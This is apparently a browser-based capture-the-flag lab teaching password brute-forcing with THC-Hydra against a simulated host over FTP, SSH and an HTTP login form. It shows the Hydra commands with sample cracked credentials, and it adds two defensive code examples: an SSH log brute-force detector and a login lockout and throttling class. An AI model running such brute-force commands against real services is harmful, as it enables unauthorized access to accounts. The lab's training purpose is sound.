Use Hydra to crack credentials across three simulated services — FTP, SSH, and HTTP. Collect 10 flags through post-authentication enumeration.
10 Flags · 100 Points · 3 Services · Targets: FTP · SSH · HTTP
No Kali Linux Required
No Kali Linux installation is required to complete this lab and collect all 10 flags. The interactive shell simulator runs entirely in your browser on any device. The Hydra commands shown in each task are for conceptual learning — you will practice running them in a live environment in a future lab.
Simulated Lab Target: 10.10.10.75
⚠ This is a SIMULATED target — use the interactive terminal below. Do not attack real systems.
BACKGROUND
What is THC-Hydra?
THC-Hydra is one of the most widely used password brute-forcing tools in penetration testing. It supports over 50 protocols including FTP, SSH, HTTP, SMB, and databases. Hydra works by systematically trying username and password combinations from a wordlist until it finds valid credentials. It is included by default in Kali Linux and is covered in CompTIA PenTest+, CEH, and OSCP certifications.
⚠ Legal Warning
Running Hydra against any system without explicit written authorization is illegal under the Computer Fraud and Abuse Act (CFAA) and similar laws worldwide. Always obtain written permission before conducting any brute-force testing.
TASKS
Step-by-Step Instructions
Task 1 — Brute Force FTP Credentials
Use Hydra to crack the FTP login on port 21 — Flags 1, 2, 3
Step 1 — Understand the Hydra FTP syntax
Hydra's basic syntax is: hydra -l [user] -P [wordlist] [target] [protocol]. The -l flag specifies a single username. The -P flag specifies a password wordlist file. RockYou is the most common wordlist on Kali Linux.
kali — hydra ftp
# Brute force FTP with a known username
┌──(kali㉿kali)-[~]
└─$ hydra -l ftpuser -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.75

Hydra v9.4 (c) 2022 by van Hauser/THC
[DATA] attacking ftp://10.10.10.75:21/
[21][ftp] host: 10.10.10.75   login: ftpuser   password: sunshine
[STATUS] attack finished for 10.10.10.75 (valid pair found)
Step 2 — Use the simulator to explore after cracking
✓ Credentials cracked — ftpuser:sunshine. Now use the Interactive Simulator below. Select the FTP Shell tab and explore the filesystem to find Flags 1, 2, and 3.
Analysis Questions
Q1. What does the -l flag do in Hydra? How is it different from the -L flag?
Q2. What is the RockYou wordlist and why is it commonly used in password cracking?
Task 2 — Brute Force SSH Credentials
Use Hydra to crack the SSH login on port 22 — Flags 4, 5, 6
Step 1 — Hydra SSH syntax
SSH brute-forcing works similarly to FTP. Add -t 4 to limit Hydra to four parallel connections, because SSH servers often block or rate-limit aggressive connection bursts. The -v flag shows verbose output so you can see each attempt.
kali — hydra ssh
# SSH brute force — limit to 4 threads to avoid lockout
└─$ hydra -l sysadmin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.75 -t 4
✓ Credentials cracked — sysadmin:master. Select the SSH Shell tab in the simulator and enumerate the system to find Flags 4, 5, and 6.
Analysis Questions
Q3. Why is it important to limit threads with -t 4 when brute-forcing SSH? What could happen with too many threads?
Q4. What defensive measures can a sysadmin implement to prevent SSH brute-force attacks? List at least three.
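The thread limit in Task 2 only slows the attacker down; from the server side the attempt still leaves a very recognisable trace in the SSH daemon's authentication log. The following is an added example (not part of the lab's own material) of the detection logic a sysadmin could run over that log, in the spirit of Q4: it parses standard OpenSSH "Failed password" / "Accepted password" syslog lines, counts failures per source address inside a sliding window, and also flags a success that arrives immediately after a burst of failures, which is the signature of a guessed password rather than a typo. The log lines, the thresholds (5 failures in 60 seconds) and the hostnames are constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample sshd log lines for this example (not output from the lab's
# simulated host): a burst of failures from one source followed by a success,
# then an unrelated user's ordinary typo-and-retry.
SAMPLE_AUTH_LOG = """\
Jan 10 12:00:01 target sshd[2101]: Failed password for sysadmin from 10.10.10.200 port 51234 ssh2
Jan 10 12:00:02 target sshd[2102]: Failed password for sysadmin from 10.10.10.200 port 51235 ssh2
Jan 10 12:00:02 target sshd[2103]: Failed password for sysadmin from 10.10.10.200 port 51236 ssh2
Jan 10 12:00:03 target sshd[2104]: Failed password for sysadmin from 10.10.10.200 port 51237 ssh2
Jan 10 12:00:04 target sshd[2105]: Failed password for invalid user test from 10.10.10.200 port 51238 ssh2
Jan 10 12:00:05 target sshd[2106]: Accepted password for sysadmin from 10.10.10.200 port 51239 ssh2
Jan 10 12:30:00 target sshd[2200]: Failed password for alice from 192.168.1.5 port 40000 ssh2
Jan 10 12:45:00 target sshd[2201]: Accepted password for alice from 192.168.1.5 port 40001 ssh2
"""

# Matches the two sshd password-authentication outcomes we care about.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2}\s+\d\d:\d\d:\d\d)\s+\S+\s+sshd\[\d+\]:\s+"
    r"(?P<outcome>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)

FAIL_THRESHOLD = 5      # failures from one source inside the window -> alert
WINDOW_SECONDS = 60     # sliding window length in seconds
SUCCESS_MIN_FAILS = 3   # a success preceded by this many failures is suspicious


def parse_line(line):
    """Return (timestamp, outcome, user, src) or None for lines we don't track."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # Syslog timestamps carry no year; strptime defaults to 1900, which is fine
    # for the relative comparisons done below.
    ts = datetime.strptime(re.sub(r"\s+", " ", m.group("ts")), "%b %d %H:%M:%S")
    return ts, m.group("outcome"), m.group("user"), m.group("src")


def analyze(log_text, threshold=FAIL_THRESHOLD, window=WINDOW_SECONDS):
    """Sliding-window brute-force detection keyed on the source address."""
    recent = defaultdict(deque)   # src -> timestamps of failures still inside the window
    alerted = set()               # sources already reported, to avoid duplicate alerts
    findings = []
    for raw in log_text.splitlines():
        parsed = parse_line(raw)
        if parsed is None:
            continue
        ts, outcome, user, src = parsed
        q = recent[src]
        # Drop failures that have aged out of the window.
        while q and (ts - q[0]).total_seconds() > window:
            q.popleft()
        if outcome == "Failed":
            q.append(ts)
            if len(q) >= threshold and src not in alerted:
                alerted.add(src)
                findings.append({
                    "type": "brute_force",
                    "src": src,
                    "failures": len(q),
                    "first": q[0].strftime("%H:%M:%S"),
                    "last": ts.strftime("%H:%M:%S"),
                })
        elif len(q) >= SUCCESS_MIN_FAILS:
            # A login that succeeds right after a burst of failures is the
            # signature of a guessed password, not a mistyped one.
            findings.append({
                "type": "success_after_failures",
                "src": src,
                "user": user,
                "preceding_failures": len(q),
            })
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_AUTH_LOG):
        print(finding)
```

On the constructed sample this reports one brute_force finding for 10.10.10.200 and one success_after_failures finding for sysadmin from the same address, while alice's single typo fifteen minutes before her successful login produces nothing. The second finding is the more important one for incident response: it tells you which account to treat as compromised, not just which address to block.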
Task 3 — Brute Force HTTP Login Form
Use Hydra to crack a web application login — Flags 7, 8, 9, 10
Step 1 — HTTP POST form brute force syntax
HTTP form brute-forcing requires the http-post-form module. You must specify the form path, the POST parameters (with ^USER^ and ^PASS^ as placeholders), and a failure string — the text that appears in the response when a login fails. Hydra treats a response that does not contain this string as a successful login.
kali — hydra http
# HTTP POST form brute force
# Format: "path:params:failure_string"
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.75 http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"
✓ Credentials cracked — admin:letmein. Select the HTTP Shell tab in the simulator and explore the admin panel to find Flags 7, 8, 9, and 10.
Analysis Questions
Q5. What is the failure string in the HTTP POST form module and why is it critical to get it right?
Q6. What is a CAPTCHA and how does it defend against HTTP brute-force attacks like the one Hydra performs?
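The Task 3 attack works because the login form answers every guess at full speed and with a message that differs only between success and failure. As an added example (not part of the lab or of any real web framework), here is a hypothetical LoginGuard class showing the server-side controls Q6 and Q8 point at, minus the CAPTCHA itself: one generic failure message for every failed outcome, a per-account lockout after a fixed number of consecutive failures, a per-source throttle over a sliding window, salted PBKDF2 password hashes compared in constant time, and a dummy hash computed for unknown usernames so that response timing does not reveal which accounts exist. Timestamps are integer seconds passed in by the caller so the behaviour is deterministic; the thresholds (5 failures, 15-minute lockout, 20 attempts per minute per source) are illustrative choices.

```python
import hashlib
import hmac
import os
from collections import defaultdict

# One message for every failed outcome, so the response body does not reveal
# whether the username exists or whether the account is currently locked.
GENERIC_FAILURE = "Invalid credentials"


class LoginGuard:
    """Hypothetical login handler with per-account lockout and per-source throttling.

    Times are plain integer seconds supplied by the caller so the behaviour is
    deterministic; a real handler would use time.time().
    """

    def __init__(self, max_failures=5, lockout_seconds=900,
                 ip_limit=20, ip_window=60, iterations=10_000):
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self.ip_limit = ip_limit
        self.ip_window = ip_window
        self.iterations = iterations          # demo value; use far more in production
        self.users = {}                       # username -> (salt, pbkdf2 hash)
        self.failures = defaultdict(int)      # username -> consecutive failures
        self.locked_until = {}                # username -> unlock timestamp
        self.ip_attempts = defaultdict(list)  # src_ip -> recent attempt timestamps
        # Hash verified for unknown usernames so their timing matches a real user.
        dummy_salt = os.urandom(16)
        self._dummy = (dummy_salt, self._hash("dummy-password", dummy_salt))

    def _hash(self, password, salt):
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, self.iterations)

    def register(self, username, password):
        salt = os.urandom(16)
        self.users[username] = (salt, self._hash(password, salt))

    def attempt(self, username, password, src_ip, now):
        # 1. Per-source throttle: record this attempt, then check the window.
        window = [t for t in self.ip_attempts[src_ip] if now - t < self.ip_window]
        window.append(now)
        self.ip_attempts[src_ip] = window
        if len(window) > self.ip_limit:
            return {"status": "throttled", "message": GENERIC_FAILURE,
                    "retry_after": self.ip_window - (now - window[0])}

        # 2. Account lockout (applied to unknown names too, so it leaks nothing).
        until = self.locked_until.get(username, 0)
        if now < until:
            return {"status": "locked", "message": GENERIC_FAILURE,
                    "retry_after": until - now}

        # 3. Verify in constant time; unknown users still pay the same hash cost.
        salt, stored = self.users.get(username, self._dummy)
        matches = hmac.compare_digest(self._hash(password, salt), stored)
        if matches and username in self.users:
            self.failures[username] = 0
            return {"status": "ok", "message": "Login successful"}

        self.failures[username] += 1
        if self.failures[username] >= self.max_failures:
            self.locked_until[username] = now + self.lockout_seconds
            self.failures[username] = 0
        return {"status": "denied", "message": GENERIC_FAILURE}


if __name__ == "__main__":
    guard = LoginGuard()
    guard.register("admin", "correct horse battery staple")
    # Constructed sequence: five wrong guesses, then the right password.
    for second in range(5):
        print(second, guard.attempt("admin", "guess%d" % second, "10.10.10.200", second))
    print(5, guard.attempt("admin", "correct horse battery staple", "10.10.10.200", 5))
```

Two design points are worth noticing. First, because the lockout is keyed on the username, it blocks the legitimate user as well as the attacker for the lockout period; that is the classic availability trade-off of lockout policies, and the per-source throttle exists so that most automated guessing is stopped before the account ever reaches the lockout threshold. Second, the failure string seen in Task 3 is now the only thing a client ever sees on failure, so the response body carries no signal beyond "not this time", and the only remaining channel for an automated guesser is the one the throttle and lockout close.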
SIMULATOR
Post-Authentication Shell Simulator
Select a service tab to switch between the three cracked environments. Each has its own filesystem with hidden flags. Type help to see available commands.
Hint: Try ls · ls -la · cd · cat · pwd · whoami · env · find · help
Final Analysis Questions
Q7. Compare the three Hydra commands used in this lab. What is different about the HTTP form brute force compared to FTP and SSH?
Q8. What password policy would have prevented all three successful cracks in this lab? Be specific about length, complexity, and lockout requirements.
READY TO SUBMIT?
Head to the flag submission page to enter your collected flags, track your score, and claim your completion badge.